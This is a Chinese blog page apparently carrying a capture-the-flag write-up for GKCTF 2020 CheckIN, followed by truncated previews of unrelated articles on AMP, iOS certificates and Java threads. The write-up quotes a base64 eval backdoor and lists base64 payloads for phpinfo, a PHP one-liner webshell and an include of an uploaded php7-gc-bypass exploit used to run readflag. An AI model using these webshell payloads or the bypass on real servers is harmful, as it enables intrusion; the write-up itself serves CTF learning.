news 2026/8/7 23:39:43

[GKCTF 2020]CheckIN

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[GKCTF 2020]CheckIN

classClassName{public$code=null;public$decode=null;function__construct(){// 1. 从 $_REQUEST(GET/POST/Cookie)中获取「Ginkgo」参数的值$this->code=@$this->x()['Ginkgo'];// 2. 对 Ginkgo 的值做 base64 解码$this->decode=@base64_decode($this->code);// 3. 执行解码后的代码@Eval($this->decode);}publicfunctionx(){return$_REQUEST;}}newClassName();// 实例化类,自动触发 __construct 方法

就是执行用base64加密的$_REQUEST传入的参数Ginkgo
phpinfo();加密后为cGhwaW5mbygpOw==

/?Ginkgo=cGhwaW5mbygpOw==


没禁用eval等函数

传一句话木马连接上shell。
eval($_POST[pwd]);加密后为ZXZhbCgkX1BPU1RbcHdkXSk7

打开却显示flag为空。
发现readflag文件,应该是运行这个文件来读flag。

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3

php7-gc-bypass漏洞源于 PHP 垃圾回收(GC)机制中的堆溢出,PHP 的 GC 在处理循环引用的变量时,会对内存块进行标记和回收。漏洞存在于内存块的大小计算逻辑中,恶意构造的循环引用变量会触发堆溢出,覆盖相邻内存数据。因此利用堆溢出可篡改函数指针,最终执行任意系统命令。

网上有EXP ( Exploit ),修改一下执行对象为readflag。
修改后上传文件至tmp目录下。

include('/tmp/exploit.php');加密后为aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/7 0:21:11

AMP页面还要做吗?2025替代方案及优化指南

2025年,AMP(移动加速页)的使命已接近终结。谷歌逐步剥离AMP的搜索特权,用户对“极简但功能残缺”的页面失去耐心,而开发者更不愿为一个“过时框架”投入双倍维护成本。如果你还在纠结“是否保留AMP”,数据已…

作者头像 李华
网站建设 2026/8/7 23:20:00

iOS 项目中证书管理常见的协作问题

在很多 iOS 项目里,证书管理并不是一个被认真规划的模块。它通常是在项目刚开始时“顺手配好”,然后长期处于无人维护的状态。直到某一天构建失败、上传受阻,或者 CI 突然跑不通,团队才意识到:问题并不在代码&#xff…

作者头像 李华
网站建设 2026/8/7 23:19:39

理解线程不安全:从观察到原因分析

一、观察线程不安全public class UnsafeCounter {private static int counter 0;public static void main(String[] args) throws InterruptedException {Thread[] threads new Thread[10];for (int i 0; i < 10; i) {threads[i] new Thread(() -> {for (int j 0; j…

作者头像 李华